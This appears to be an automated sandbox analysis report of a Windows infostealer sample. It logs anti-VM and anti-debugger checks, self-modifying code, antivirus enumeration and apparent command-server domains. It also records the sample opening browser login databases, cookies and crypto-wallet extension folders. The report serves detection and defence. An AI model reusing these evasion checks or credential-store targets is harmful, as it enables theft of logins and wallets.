          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED079A second address: 4ED0844 instructions: 0x00000000 rdtsc 0x00000002 mov dx, CB88h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov di, 83A0h 0x00000011 mov bx, 39CCh 0x00000015 popad 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F1FDD1C1211h 0x0000001f or ax, FAA6h 0x00000024 jmp 00007F1FDD1C1211h 0x00000029 popfd 0x0000002a mov ecx, 2C2D6DD7h 0x0000002f popad 0x00000030 je 00007F204DD7EDDBh 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F1FDD1C1218h 0x0000003d and cx, 4B78h 0x00000042 jmp 00007F1FDD1C120Bh 0x00000047 popfd 0x00000048 popad 0x00000049 cmp dword ptr [75AF459Ch], 05h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushfd 0x00000054 jmp 00007F1FDD1C120Eh 0x00000059 sub esi, 67CBE5D8h 0x0000005f jmp 00007F1FDD1C120Bh 0x00000064 popfd 0x00000065 mov cx, D48Fh 0x00000069 popad 0x0000006a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0844 second address: 4ED0898 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F204DD9707Fh 0x00000010 pushad 0x00000011 pushad 0x00000012 mov di, 3038h 0x00000016 push edi 0x00000017 pop esi 0x00000018 popad 0x00000019 call 00007F1FDD1C143Dh 0x0000001e pushfd 0x0000001f jmp 00007F1FDD1C1440h 0x00000024 sbb esi, 32472A98h 0x0000002a jmp 00007F1FDD1C143Bh 0x0000002f popfd 0x00000030 pop eax 0x00000031 popad 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov bx, A9E0h 0x0000003a popad 0x0000003b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED092C second address: 4ED0980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1FDD1C1211h 0x00000010 sbb ch, 00000016h 0x00000013 jmp 00007F1FDD1C1211h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007F1FDD1C1210h 0x0000001f sub ax, 4338h 0x00000024 jmp 00007F1FDD1C120Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7FEC70 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9AB7B4 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
          Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
          Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
          Source: C:\Users\user\Desktop\file.exe TID: 6476 Thread sleep time: -180000s >= -30000s
          Source: C:\Users\user\Desktop\file.exe TID: 6476 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: file.exe, 00000000.00000002.2172764951.000000000098D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096488504.00000000058A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: file.exe, 00000000.00000003.2172028798.0000000001008000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125906580.000000000100C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144607854.000000000100C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2174079269.0000000001008000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140689399.000000000100C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2169569460.000000000100C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%
          Source: file.exe, 00000000.00000002.2174079269.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2173779051.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172028798.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125906580.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144607854.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2169569460.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140689399.0000000001015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096488504.00000000058A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
          Source: file.exe, 00000000.00000002.2172764951.000000000098D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
          Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

          Anti Debugging

          Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exe File opened: NTICE
          Source: C:\Users\user\Desktop\file.exe File opened: SICE
          Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
          Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort

          HIPS / PFW / Operating System Protection Evasion

          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: scriptyprefej.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: navygenerayk.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: founpiuer.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: necklacedmny.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: thumbystriw.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: fadehairucw.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: crisiwarny.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: presticitpo.store
          Source: file.exe, 00000000.00000002.2172907899.00000000009D2000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: fProgram Manager
          Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 6764, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: file.exe, 00000000.00000003.2125906580.0000000001015000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
Source: file.exe, 00000000.00000003.2125906580.0000000001015000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000000.00000003.2169490945.0000000001062000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000003.2125906580.0000000001015000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.2125575887.000000000106D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Exodus
Source: file.exe, 00000000.00000003.2125575887.000000000106D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.2125575887.000000000106D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
